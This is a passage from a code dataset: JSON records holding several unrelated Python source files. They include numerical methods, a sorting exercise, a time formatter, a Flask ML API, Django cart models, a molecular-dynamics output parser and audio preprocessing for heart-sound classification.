f_x.evalf(subs={x: val})\n\n\ndef falsePosition(f_x, x0, x1, e=0.00001):\n step = 1\n diff_f = sym.diff(f_x, x)\n ivl = sym.Interval (x0, x1)\n if abs(sym.minimum(diff_f, x, ivl)) < abs(sym.maximum(diff_f, x, ivl)):\n m = abs(sym.minimum(diff_f, x, ivl))\n M = abs(sym.maximum(diff_f, x, ivl))\n else:\n m = abs(sym.maximum(diff_f, x, ivl))\n M = abs(sym.minimum(diff_f, x, ivl))\n\n print(\"\\n\\n*** FALSE POSITION METHOD IMPLEMENTATION ***\")\n condition = True\n lst_x = []\n lst_e1 = []\n lst_e2 = []\n while condition:\n x2 = x0 - (x1 - x0) * f(f_x, x0) / (f(f_x, x1) - f(f_x, x0))\n lst_x.append(x2)\n print(\"Iteration-%d, x2 = %0.8f and f(x2) = %0.8f\" % (step, x2, f(f_x, x2)))\n # print()\n if f(f_x, x0) * f(f_x, x2) < 0:\n x1 = x2\n else:\n x0 = x2\n\n step = step + 1\n condition = abs(f(f_x, x2)) > e\n err_1 = abs(f(f_x, x2)) / m\n lst_e1.append(err_1)\n # lst_e2.append(err_2)\n\n print(\"\\nRequired root is: %0.8f\" % x2)\n print(f\"f'x = {sym.diff(f_x, x)}\")\n print(f\"f\\\"x = {sym.diff(f_x, x, x)}\")\n print(f\"m = {m}, M = {M}\")\n print(\"Error 1 is: %0.8f\" %abs(f(f_x, x2)/m))\ndef main():\n \n # sol = sym.nsolve(f_x, -1.3)\n # print(sol)\n x0 = input(\"First Guess: \")\n x1 = input(\"Second Guess: \")\n e = input(\"Tolerable Error: \")\n\n x0 = float(x0)\n x1 = float(x1)\n e = float(e)\n\n if f(f_x, x0) * f(f_x, x1) > 0.0:\n print(\"Given guess values do not bracket the root.\")\n print(\"Try Again with different guess values.\")\n else:\n falsePosition(f_x, x0, x1, e)\n\nif __name__ == '__main__':\n main()\n","repo_name":"saltmurai/numerical-method","sub_path":"regula_falsi.py","file_name":"regula_falsi.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36375028729","text":"# File : PR13A_2272028.py\r\n# Penulis : Nathaniel Valentino Robert\r\n# Deskripsi\r\n# Buatlah program yang akan menerima masukan N\r\n# buah bilangan lalu akan menampilkan N bilangan\r\n# tersebut secara terurut menurun. \r\n# Kamus Data\r\n# N = var input panjang array\r\n# Arr = var deklarasi array kosong sepanjang N\r\n# num = var agar print tidak didalam array\r\ndef main():\r\n N = int(input(\"N : \"))\r\n Arr = [0] * N\r\n\r\n for i in range(N):\r\n Arr[i] = int(input(\"Masukkan bilangan ke-{}: \".format(i+1)))\r\n\r\n # Mengurutkan bilangan secara menurun\r\n for i in range(N):\r\n for j in range(i+1, N):\r\n if Arr[i] > Arr[j]:\r\n Arr[i], Arr[j] = Arr[j], Arr[i]\r\n\r\n print(\"Bilangan terurut menurun:\")\r\n for num in Arr:\r\n print(num, end=\" \")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"nathaniel-valen/daspro","sub_path":"Pertemuan 14/PR13A_2722028.py","file_name":"PR13A_2722028.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70961272804","text":"def add_time(start, duration, day=None):\n MORNING = \"AM\"\n NIGHT = \"PM\"\n new_time = \"\"\n\n\n # Days of the week for evaluating\n week_map = {'Monday': 1, 'Tuesday': 2, 'Wednesday': 3, 'Thursday': 4, 'Friday': 5, 'Saturday': 6,\n 'Sunday': 7}\n\n\n # Split intial time\n start_hours = int(start.split()[0].split(\":\")[0])\n start_minutes = int(start.split()[0].split(\":\")[1])\n start_midday = start.split()[1].upper()\n\n # Split time to add\n duration_hours = int(duration.split(\":\")[0])\n duration_minutes = int(duration.split(\":\")[1])\n\n # Add times\n total_hours = start_hours + duration_hours\n total_minutes = start_minutes + duration_minutes\n\n # Add 12 hours for 24 hr time\n if start_midday == NIGHT:\n total_hours += 12\n\n # Add minutes to new hours and set remaining minutes to total_minutes\n if total_minutes >= 60:\n total_hours += total_minutes // 60\n total_minutes = total_minutes % 60\n\n\n\n # Declarations\n # ---------------------------------------------------------------\n # Days later\n total_days = total_hours // 24\n\n # Day of the week to print\n result_day = None\n\n # Result hours to print\n result_hours = (total_hours % 24) % 12\n\n # Result minutes to print\n result_minutes = None\n\n # Result midday to print\n result_midday = MORNING if (total_hours % 24) < 12 else NIGHT\n # ---------------------------------------------------------------\n\n\n\n #Deal with midnight/noon\n if result_hours == 0:\n result_hours = '12'\n result_hours = str(result_hours)\n\n #Format minutes if 10s placeholder is 0\n if total_minutes < 10:\n result_minutes = f\":0{total_minutes}\"\n else:\n result_minutes = f\":{total_minutes}\"\n\n\n # Base return\n new_time = f\"{result_hours}{result_minutes} {result_midday}\"\n\n\n if day == None:\n if total_days == 1:\n return new_time + \" (next day)\"\n if total_days == 0:\n return new_time\n return f\"{new_time} ({total_days} days later)\"\n else:\n day_value = (week_map[day.lower().capitalize()] + total_days) % 7\n for day_key, day_v in week_map.items():\n if day_v == day_value:\n day_value = day_key\n\n if total_days == 0:\n return f\"{new_time}, {day_value}\"\n elif total_days == 1:\n return f\"{new_time}, {day_value} (next day)\"\n else:\n return f\"{new_time}, {day_value} ({total_days} days later)\"\n\n","repo_name":"fhut/Portfolio","sub_path":"TimeFormatter/TimeFormat.py","file_name":"TimeFormat.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70595705444","text":"import pickle\nfrom flask import Flask, request, jsonify, render_template\nimport numpy as np\nimport jsonpickle\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n\n# Initialize the Flask application\napp = Flask(__name__)\n\n# Load the saved model from the pickle file\nwith open('wine_pca_model.pkl', 'rb') as f:\n model = pickle.load(f)\nwith open('standard_scaler.pkl', 'rb') as f:\n sc = pickle.load(f)\nwith open('pca.pkl', 'rb') as f:\n pca = pickle.load(f)\n\n@app.route('/api/test', methods=['GET'])\ndef test():\n # Model code\n response = {'message': 'API hit iimv'}\n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n# Define the home page that displays the HTML form\n@app.route('/api/home')\ndef home():\n return render_template('index.html')\n\n# Define the API endpoint for making predictions\n@app.route('/api/predict', methods=['POST'])\ndef predict():\n # Get the input features from the form data\n feature1 = request.form['feature1']\n feature2 = request.form['feature2']\n feature3 = request.form['feature3']\n feature4 = request.form['feature4']\n feature5 = request.form['feature5']\n feature6 = request.form['feature6']\n feature7 = request.form['feature7']\n feature8 = request.form['feature8']\n feature9 = request.form['feature9']\n feature10 = request.form['feature10']\n feature11 = request.form['feature11']\n feature12 = request.form['feature12']\n feature13 = request.form['feature13']\n # repeat for all 13 features\n input_features = {\n 'Feature 1': feature1,\n 'Feature 2': feature2,\n 'Feature 3': feature3,\n 'Feature 4': feature4,\n 'Feature 5': feature5,\n 'Feature 6': feature6,\n 'Feature 7': feature7,\n 'Feature 8': feature8,\n 'Feature 9': feature9,\n 'Feature 10': feature10,\n 'Feature 11': feature11,\n 'Feature 12': feature12,\n 'Feature 13': feature13\n }\n \n # Pack the input features into a NumPy array\n X_test = np.array([feature1, feature2, feature3, feature4, feature5, feature6, feature7, feature8, feature9, feature10, feature11, feature12, feature13])\n\n# Transform the input data using the same StandardScaler and PCA objects\n\n X_test = sc.transform(X_test.reshape(1,-1))\n X_test = pca.transform(X_test)\n \n \n # Make the prediction using the trained model\n y_pred = model.predict(X_test)\n \n # Return the predicted label to the HTML page\n return render_template('index.html', prediction_text='Customer segment: {}'.format(y_pred),input_features=input_features)\n\n# Run the Flask application\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"Harshavarthanan/wine_prediction","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34148168714","text":"import os,sys\nimport numpy as np\nfrom .scf import ry2ev, kbar2evperang3, get_block, get_geometry_in, get_cell, get_coords\n\n# Read in geometries from an ABACUS MD trajectory.\n# The atomic coordinates are read in from generated files in OUT.XXXX.\n# Energies, forces\n# IMPORTANT: the program defaultly takes STRU input file as standard cell information,\n# therefore the direct and cartesan coordinates read could be different from the ones in \n# the output cif files!!!\n# It is highly recommanded to use ORTHOGANAL coordinates in STRU file if you wish to get\n# same coordinates in both dpdata and output cif files. \n\ndef get_path_out(fname, inlines):\n # This function is different from the same-name function in scf.py.\n # This function returns OUT.XXXX's base directory.\n path_out = os.path.join(fname, \"OUT.ABACUS/\")\n for line in inlines:\n if len(line)>0 and \"suffix\" in line and \"suffix\"==line.split()[0]:\n suffix = line.split()[1]\n path_out = os.path.join(fname, \"OUT.%s/\" % suffix)\n break\n return path_out\n\ndef get_coord_dump_freq(inlines):\n for line in inlines:\n if len(line)>0 and \"md_dumpmdfred\" in line and \"md_dumpmdfred\" == line.split()[0]:\n return int(line.split()[1])\n return 1\n\n# set up a cell according to cell info in cif file.\n# maybe useful later\n'''\ndef setup_cell(a, b, c, alpha, beta, gamma):\n cell = np.zeros(3, 3)\n cell[0, 0] = a\n cell[1, 0] = b*np.cos(gamma/180*np.pi)\n cell[1, 1] = b*np.sin(gamma/180*np.pi)\n cell[2, 0] = c*np.cos(beta/180*np.pi)\n cell[2, 1] = c*(b*np.cos(alpha/180*np.pi) - cell[1, 0]*np.cos(beta/180*np.pi))/cell[1, 1]\n cell[2, 2] = np.sqrt(c**2 - cell[2, 0]**2 - cell[2, 1]**2)\n return cell\n'''\n\ndef get_single_coord_from_cif(pos_file, atom_names, natoms, cell):\n assert(len(atom_names) == len(natoms))\n nele = len(atom_names)\n total_natoms = sum(natoms)\n coord = np.zeros([total_natoms, 3])\n a = 0\n b = 0\n c = 0\n alpha = 0\n beta = 0\n gamma = 0\n with open(pos_file, \"r\") as fp:\n lines = fp.read().split(\"\\n\")\n for line in lines:\n if \"_cell_length_a\" in line:\n a = float(line.split()[1])\n if \"_cell_length_b\" in line:\n b = float(line.split()[1])\n if \"_cell_length_c\" in line:\n c = float(line.split()[1]) \n if \"_cell_angle_alpha\" in line:\n alpha = float(line.split()[1])\n if \"_cell_angle_beta\" in line:\n beta = float(line.split()[1])\n if \"_cell_angle_gamma\" in line:\n gamma = float(line.split()[1])\n assert(a > 0 and b > 0 and c > 0 and alpha > 0 and beta > 0 and gamma > 0)\n #cell = setup_cell(a, b, c, alpha, beta, gamma)\n coord_lines = get_block(lines=lines, keyword=\"_atom_site_fract_z\", skip=0, nlines = total_natoms)\n \n ia_idx = 0\n for it in range(nele):\n for ia in range(natoms[it]):\n coord_line = coord_lines[ia_idx].split()\n assert(coord_line[0] == atom_names[it])\n coord[ia_idx, 0] = float(coord_line[1])\n coord[ia_idx, 1] = float(coord_line[2])\n coord[ia_idx, 2] = float(coord_line[3])\n ia_idx+=1\n coord = np.matmul(coord, cell)\n # important! Coordinates are converted to Cartesian coordinate.\n return coord\n \n \ndef get_coords_from_cif(ndump, dump_freq, atom_names, natoms, types, path_out, cell):\n total_natoms = sum(natoms)\n #cell = np.zeros(ndump, 3, 3)\n coords = np.zeros([ndump, total_natoms, 3])\n pos_file = os.path.join(path_out, \"STRU_READIN_ADJUST.cif\")\n # frame 0 file is different from any other frames\n coords[0] = get_single_coord_from_cif(pos_file, atom_names, natoms, cell)\n for dump_idx in range(1, ndump):\n pos_file = os.path.join(path_out, \"md_pos_%d.cif\" %(dump_idx*dump_freq))\n #print(\"dump_idx = %s\" %dump_idx)\n coords[dump_idx] = get_single_coord_from_cif(pos_file, atom_names, natoms, cell)\n return coords\n\ndef get_energy_force_stress(outlines, inlines, dump_freq, ndump, natoms, atom_names):\n stress = None\n total_natoms = sum(natoms)\n for line in inlines:\n if len(line)>0 and \"stress\" in line and \"stress\" == line.split()[0] and \"1\" == line.split()[1]:\n stress = np.zeros([ndump, 3, 3])\n break\n if type(stress) != np.ndarray:\n print(\"The ABACUS program has no stress output. Stress will not be read.\")\n nenergy = 0\n nforce = 0\n nstress = 0\n energy = np.zeros(ndump)\n force = np.zeros([ndump, total_natoms, 3])\n\n for line_idx, line in enumerate(outlines):\n if \"final etot is\" in line:\n if nenergy%dump_freq == 0:\n energy[int(nenergy/dump_freq)] = float(line.split()[-2])\n nenergy+=1\n if \"TOTAL-FORCE (eV/Angstrom)\" in line:\n for iatom in range(0, total_natoms):\n force_line = outlines[line_idx+5+iatom]\n atom_force = [float(i) for i in force_line.split()[1:]]\n assert(len(atom_force) == 3)\n atom_force = np.array(atom_force)\n if nforce%dump_freq == 0:\n force[int(nforce/dump_freq), iatom] = atom_force\n nforce+=1\n assert(nforce==nenergy)\n if \"TOTAL-STRESS (KBAR)\" in line:\n for idx in range(0, 3):\n stress_line = outlines[line_idx+4+idx]\n single_stress = [float(i) for i in stress_line.split()]\n if len(single_stress) != 3:\n print(single_stress)\n assert(len(single_stress) == 3)\n single_stress = np.array(single_stress)\n if nstress%dump_freq == 0:\n stress[int(nstress/dump_freq), idx] = single_stress\n nstress+=1\n assert(nstress==nforce)\n if type(stress) == np.ndarray:\n stress *= kbar2evperang3\n return energy, force, stress\n\n\ndef get_frame (fname):\n if type(fname) == str:\n # if the input parameter is only one string, it is assumed that it is the \n # base directory containing INPUT file;\n path_in = os.path.join(fname, \"INPUT\")\n else:\n raise RuntimeError('invalid input') \n with open(path_in, 'r') as fp:\n inlines = fp.read().split('\\n')\n geometry_path_in = get_geometry_in(fname, inlines) # base dir of STRU\n path_out = get_path_out(fname, inlines) \n\n with open(geometry_path_in, 'r') as fp:\n geometry_inlines = fp.read().split('\\n')\n celldm, cell = get_cell(geometry_inlines) \n atom_names, natoms, types, coords = get_coords(celldm, cell, geometry_inlines, inlines) \n # This coords is not to be used.\n dump_freq = get_coord_dump_freq(inlines = inlines)\n ndump = int(os.popen(\"ls -l %s | grep 'md_pos_' | wc -l\" %path_out).readlines()[0])\n # number of dumped geometry files\n coords = get_coords_from_cif(ndump, dump_freq, atom_names, natoms, types, path_out, cell)\n \n # TODO: Read in energies, forces and pressures.\n with open(os.path.join(path_out, \"running_md.log\"), 'r') as fp:\n outlines = fp.read().split('\\n')\n energy, force, stress = get_energy_force_stress(outlines, inlines, dump_freq, ndump, natoms, atom_names)\n if type(stress) == np.ndarray:\n stress *= np.linalg.det(cell)\n data = {}\n data['atom_names'] = atom_names\n data['atom_numbs'] = natoms\n data['atom_types'] = types\n data['cells'] = np.zeros([ndump, 3, 3])\n for idx in range(ndump):\n data['cells'][:, :, :] = cell\n data['coords'] = coords\n data['energies'] = energy\n data['forces'] = force\n data['virials'] = stress\n if type(data['virials']) != np.ndarray:\n del data['virials']\n data['orig'] = np.zeros(3)\n\n return data\n","repo_name":"Vibsteamer/dpdata","sub_path":"dpdata/abacus/md.py","file_name":"md.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"29320500856","text":"import math, random\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init, functional\nfrom torch.utils.data import DataLoader, Dataset, random_split\n\nimport torchaudio\nfrom torchaudio import transforms\n\nfrom scipy.signal import filtfilt\nfrom scipy import stats\nimport scipy\n\nimport io\n\n\n#To allow plotting pytorch tensors\ntorch.Tensor.ndim = property(lambda self: len(self.shape))\n#use gpu if available\ndevice = torch.device(\"cpu\")\n\nSEED = 0\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\n\nMAX_AUDIO_LENGTH = 10000\nSAMPLING_RATE = 2000\nN_CHANNELS = 1\nSHIFT_PCT = 0.2\nFREQ_SHIFT_PCT = 1\n\nLOW_FREQ = 15\nHIGH_FREQ = 400\nORDER = 3\n\nSPEC_HOP_LENGTH=64\nSPEC_N_FFT=256 # standard number\nSPEC_N_MELS=128 \n\nMFCC_HOP_LENGTH=64\nMFCC_N_FFT=256 # standard number\nMFCC_N_MELS=64 \nN_MFCC=14 # standard number\n\nclass AudioUtil():\n @staticmethod\n def open(audio_file):\n\n #Open an audio file\n # print(f\"Opening file : {audio_file}\")\n sig, sr = torchaudio.load(audio_file)\n sig.to(device)\n return (sig, sr)\n\n @staticmethod\n def rechannel(aud, new_channel):\n\n #Convert the audio from mono to stereo or vice versa\n\n sig, sr = aud\n\n if(sig.shape[0] == new_channel):\n return aud\n \n # print('Rechanneling to ' + str(new_channel))\n if(new_channel == 1):\n resig = sig[:1, :]\n else:\n resig = torch.cat([sig, sig])\n \n return ((resig, sr))\n\n @staticmethod\n def resample(aud, newsr):\n\n #Resample the audio to the newsr frequency\n\n sig, sr = aud\n \n if(sr == newsr):\n return((sig, sr))\n \n # print('Resampling to ' + str(newsr))\n\n num_channels = sig.shape[0]\n resig_fn = torchaudio.transforms.Resample(sr, newsr).to(device)\n resig = resig_fn(sig[:1, :].to(device))\n if(num_channels > 1):\n retwo_fn = torchaudio.transforms.Resample(sr, newsr).to(device)\n retwo = retwo_fn(sig[1:, :].to(device))\n resig = torch.cat([resig, retwo])\n\n return((resig, newsr))\n\n @staticmethod\n def butterworth_filter(aud, low_cutoff_freq=15, high_cutoff_freq=900, order=3):\n sig, sr = aud\n\n nyq = 0.5 * sr\n low = low_cutoff_freq / nyq\n high = high_cutoff_freq / nyq\n \n b, a = scipy.signal.butter(order, [low, high], 'bandpass', analog=False)\n filtered_sig = scipy.signal.filtfilt(b, a, sig.cpu(), axis=1)\n filtered_sig = torch.Tensor(filtered_sig.copy()).to(device)\n \n return ((filtered_sig, sr))\n\n @staticmethod\n def pad_trunc(aud, max_len):\n #add padding, or truncate the signal to fit the max length\n sig, sr = aud\n num_rows, sig_len = sig.shape\n\n if(sig_len > max_len):\n #Truncate the signal\n # print('Truncating signal to ' + str(max_ms) + ' ms')\n sig = sig[:, :max_len]\n elif(sig_len < max_len):\n #Add padding\n # print('Padding signal to ' + str(max_ms) + ' ms')\n pad_begin_len = random.randint(0, max_len - sig_len)\n pad_end_len = max_len - sig_len - pad_begin_len\n\n pad_begin = torch.zeros((num_rows, pad_begin_len)).to(device)\n pad_end = torch.zeros((num_rows, pad_end_len)).to(device)\n\n sig = torch.cat((pad_begin, sig, pad_end), 1)\n \n return ((sig, sr))\n\n @staticmethod\n def time_shift(aud, shift_limit):\n sig, sr = aud\n _, sig_len = sig.shape\n shift_amt = int(random.random() * shift_limit * sig_len)\n return (sig.roll(shift_amt), sr)\n\n @staticmethod\n def pitch_shift(aud, shift_limit):\n sig, sr = aud\n shift_amt = random.random() * shift_limit\n return (sig * shift_amt, sr)\n\n @staticmethod\n def get_mel_spectrogram(aud, hop_length=512, n_fft=1024, n_mels=64):\n sig, sr = aud\n top_db = 80\n\n mel_transformation = torchaudio.transforms.MelSpectrogram(sample_rate=sr, n_fft=n_fft, hop_length=hop_length, n_mels=n_mels)\n db_transformation = torchaudio.transforms.AmplitudeToDB(top_db=top_db)\n mel_transformation.to(device)\n db_transformation.to(device)\n spec = mel_transformation(sig.to(device))\n spec = db_transformation(spec.to(device))\n return spec\n\n @staticmethod\n def spectro_augment(spec, max_mask_pct = 0.1, n_freq_masks = 1, n_time_masks=1):\n _, n_mels, n_steps = spec.shape\n mask_value = spec.mean()\n aug_spec = spec\n\n freq_max_param = max_mask_pct * n_mels\n for _ in range(n_freq_masks):\n aug_spec = transforms.FrequencyMasking(freq_max_param).to(device)(aug_spec, mask_value)\n time_mask_params = max_mask_pct * n_steps\n for _ in range(n_time_masks):\n aug_spec = transforms.TimeMasking(time_mask_params).to(device)(aug_spec, mask_value)\n\n return aug_spec\n\n @staticmethod\n def get_MFCC(aud, hop_length=512, n_fft=1024, n_mels=64, n_mfcc = 64):\n sig, sr = aud\n mfcc_fn = transforms.MFCC( sample_rate=sr,\n n_mfcc=n_mfcc,\n melkwargs={\"n_fft\": n_fft, \"n_mels\": n_mels, \"hop_length\": hop_length})\n mfcc_fn.to(device)\n return mfcc_fn(sig.to(device))\n \n @staticmethod\n def get_DeltaMFCC(mfcc):\n delta_fn = torchaudio.transforms.ComputeDeltas().to(device)\n delta_mfcc = delta_fn(mfcc)\n delta2_mfcc = delta_fn(delta_mfcc)\n\n return (delta_mfcc, delta2_mfcc)\n \n @staticmethod\n def getWindows(aud, window_len=5000, overlap=0.1, test=False, mfcc=False, delta=False):\n sig, sr = aud\n sig_len = len(sig[0])\n result = []\n if(sig_len <= window_len):\n w_aud = AudioUtil.pad_trunc(aud, window_len)\n w_aud = AudioUtil.pitch_shift(w_aud, SHIFT_PCT)\n if mfcc:\n w_spec = AudioUtil.get_MFCC(w_aud, MFCC_HOP_LENGTH, MFCC_N_FFT, MFCC_N_MELS, n_mfcc=N_MFCC)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n else:\n w_spec = AudioUtil.get_mel_spectrogram(w_aud, hop_length=SPEC_HOP_LENGTH, n_fft=SPEC_N_FFT, n_mels=SPEC_N_MELS)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n if not test:\n w_spec = AudioUtil.spectro_augment(w_spec, n_freq_masks=1, n_time_masks=2)\n result.append(w_spec)\n else:\n start = 0\n end = window_len\n while end <= sig_len:\n w = sig[0][start:end]\n w_aud = (w.unsqueeze(dim=0), sr)\n w_aud = AudioUtil.pitch_shift(w_aud, SHIFT_PCT)\n if mfcc:\n w_spec = AudioUtil.get_MFCC(w_aud, MFCC_HOP_LENGTH, MFCC_N_FFT, MFCC_N_MELS, n_mfcc=N_MFCC)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n else:\n w_spec = AudioUtil.get_mel_spectrogram(w_aud, hop_length=SPEC_HOP_LENGTH, n_fft=SPEC_N_FFT, n_mels=SPEC_N_MELS)\n if delta:\n delta_1, delta_2 = AudioUtil.get_DeltaMFCC(w_spec)\n w_spec = torch.cat([w_spec, delta_1, delta_2], dim=0)\n if not test:\n w_spec = AudioUtil.spectro_augment(w_spec, n_freq_masks=1, n_time_masks=2)\n result.append(w_spec)\n\n start = int(end - overlap * window_len)\n end = int(start + window_len)\n return result\n\n @staticmethod\n def preprocess_audio_windowed(audio_dir, test=False, mfcc=False, delta=False):\n aud = AudioUtil.open(audio_dir)\n aud = AudioUtil.rechannel(aud, N_CHANNELS)\n aud = AudioUtil.resample(aud, SAMPLING_RATE)\n aud = AudioUtil.butterworth_filter(aud, LOW_FREQ, HIGH_FREQ, ORDER)\n result = AudioUtil.getWindows(aud, MAX_AUDIO_LENGTH, overlap=0.1, test=test, mfcc=mfcc, delta=delta)\n return result\n\n @staticmethod\n def preprocess_audio_only(audio_dir):\n aud = AudioUtil.open(audio_dir)\n aud = AudioUtil.rechannel(aud, N_CHANNELS)\n aud = AudioUtil.resample(aud, SAMPLING_RATE)\n aud = AudioUtil.pad_trunc(aud, MAX_AUDIO_LENGTH)\n aud = AudioUtil.time_shift(aud, SHIFT_PCT)\n aud = AudioUtil.pitch_shift(aud, FREQ_SHIFT_PCT)\n sig, sr = aud\n return sig\n @staticmethod\n def preprocess_audio(audio_dir):\n aud = AudioUtil.open(audio_dir)\n aud = AudioUtil.rechannel(aud, N_CHANNELS)\n aud = AudioUtil.resample(aud, SAMPLING_RATE)\n aud = AudioUtil.butterworth_filter(aud, LOW_FREQ, HIGH_FREQ, ORDER)\n aud = AudioUtil.pad_trunc(aud, MAX_AUDIO_LENGTH)\n sig, sr = aud\n print(sig.shape)\n aud = AudioUtil.time_shift(aud, SHIFT_PCT)\n aud = AudioUtil.pitch_shift(aud, SHIFT_PCT)\n \n spec = AudioUtil.get_mel_spectrogram(aud, hop_length=SPEC_HOP_LENGTH, n_fft=SPEC_N_FFT, n_mels=SPEC_N_MELS)\n aug_spec = AudioUtil.spectro_augment(spec, n_freq_masks=2, n_time_masks=2)\n mfcc = AudioUtil.get_MFCC(aud, hop_length=MFCC_HOP_LENGTH, n_fft=MFCC_N_FFT, n_mels=MFCC_N_MELS, n_mfcc=N_MFCC)\n mfcc_1, mfcc_2 = AudioUtil.get_DeltaMFCC(mfcc)\n return (aud, spec, aug_spec, mfcc, mfcc_1, mfcc_2)\n \n\ndef getPreprocessedData(audio_bytes, mfcc=True):\n audio = io.BytesIO(audio_bytes)\n result = AudioUtil.preprocess_audio_windowed(audio, mfcc=mfcc, delta=True, test=True)\n return result\n","repo_name":"iTzAymen/pcg-api","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":9901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10116372969","text":"\"\"\"\nThis is a django-split-settings main file.\nFor more information read this:\nhttps://github.com/sobolevn/django-split-settings\nDefault environment is `developement`.\nTo change settings file:\n`DJANGO_ENV=production python manage.py runserver`\n\"\"\"\nfrom split_settings.tools import include\n\nfrom env import env\n\nbase_settings = [\n 'components/*.py',\n\n # Select the right env:\n 'environments/%s.py' % env('PAYSYS_DJANGO_ENV'),\n]\n\n# Include settings:\ninclude(*base_settings)\n","repo_name":"dbykov/payment-system","sub_path":"project/project/settings/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35756468608","text":"# 문제 -lv 2 \n'''\n# #1-230206 실패\n# 틀린 이유 : 가장 짧은 문자열만이 접두어가 되는 것이 아님\n'''\nimport collections\ndef solution(phone_book):\n \n test = collections.Counter(phone_book)\n \n # 1. 요소 길이순으로 정렬\n phone_book.sort(key=len)\n \n # 2. 가장 짧은 문자열 길이만큼 각 요소를 슬라이딩하여 딕셔너리 키 값 저장 \n dict = {}\n min_len = len(phone_book[0])\n for p in phone_book:\n p_key = p[:min_len]\n \n if not p_key in dict.keys():\n dict[p_key] = 1\n else :\n return False\n \n return True","repo_name":"HyeM207/Algorithm","sub_path":"Programmers/Lv_2/[Prg] 전화번호 목록.py","file_name":"[Prg] 전화번호 목록.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24638953979","text":"from decimal import Decimal\n\nfrom django.db import models\nfrom django.conf import settings\nfrom django.db.models import Sum\nfrom django.db.models.signals import pre_save, m2m_changed\n\nfrom products.models import Product\n\n\nUser = settings.AUTH_USER_MODEL\n\n\nclass CartManager(models.Manager):\n\n def get_or_new(self, request): # get existing cart else create new\n cart_id = request.session.get('cart_id', None)\n qs = self.get_queryset().filter(id=cart_id)\n if qs.count() == 1:\n new_obj = False\n cart_obj = qs.first()\n if request.user.is_authenticated() and cart_obj.user is None:\n cart_obj.user = request.user\n cart_obj.save()\n else: # This block will be executed when no such id exists or id cotntains non-numeric characters\n cart_obj = Cart.objects.new(user=request.user)\n new_obj = True\n request.session['cart_id'] = cart_obj.id\n return cart_obj, new_obj\n\n def new(self, user=None):\n user_obj = None\n if user is not None and user.is_authenticated():\n user_obj = user\n return self.model.objects.create(user=user_obj)\n\n\nclass Cart(models.Model):\n user = models.ForeignKey(User, null=True, blank=True) # Non-logged in user can also create a cart\n products = models.ManyToManyField(Product, blank=True) # Cart can be blank\n subtotal = models.DecimalField(default=0.00, max_digits=100, decimal_places=2) # stores the total of cart\n total = models.DecimalField(default=0.00, max_digits=100, decimal_places=2) # stores the final price\n updated = models.DateTimeField(auto_now=True) # Last updated time\n timestamp = models.DateTimeField(auto_now_add=True) # Created time\n\n objects = CartManager()\n\n def __str__(self):\n return str(self.id)\n\n @property\n def has_tax(self):\n if self.subtotal != self.total:\n return True\n return False\n\n @property\n def is_digital(self):\n qs = self.products.filter(is_digital=False)\n if qs.exists():\n return False\n return True\n\n def get_tax(self):\n if self.has_tax:\n return self.total - self.subtotal\n return None\n\n def non_digital_products_total(self):\n qs = self.products.filter(is_digital=False)\n if qs.exists():\n total = qs.aggregate(Sum('price'))\n return total.get('price__sum')\n return 0\n\n\ndef m2m_changed_cart_receiver(sender, instance, action, *args, **kwargs):\n # The following if block avoids calculations during pre actions\n if action == 'post_remove' or action == 'post_add' or action == 'post_clear':\n products = instance.products.all()\n total = 0\n for product in products:\n total += product.price\n if instance.subtotal != total:\n instance.subtotal = total\n instance.save() # Since it is not a pre_save receiver, .save() is required\n\nm2m_changed.connect(m2m_changed_cart_receiver, sender=Cart.products.through)\n\n\n# This is used to include/deduct amount from subtotal like shipping charges, discounts e.t.c.\ndef pre_save_cart_receiver(sender, instance, *args, **kwargs):\n if instance.subtotal > 0:\n instance.total = instance.subtotal\n # instance.total = Decimal(instance.subtotal) * Decimal(1.08) # 8% tax\n # OR --> instance.total = float(instance.subtotal) * float(1.08)\n else:\n instance.total = 0.00\n\npre_save.connect(pre_save_cart_receiver, sender=Cart)\n","repo_name":"shan18/Kart","sub_path":"src/carts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"39131396234","text":"#!/usr/bin/env python3\n\n__day__ = 4\n\n__year__ = 2021\n\n__motd__ = '--- Year %s -- Day %s ---' % (__year__, __day__)\n\n__url__ = 'http://adventofcode.com/%s/day/%s' % (__year__, __day__)\n\nverbose = 0\n\n\nclass Field:\n\n def __init__(self, 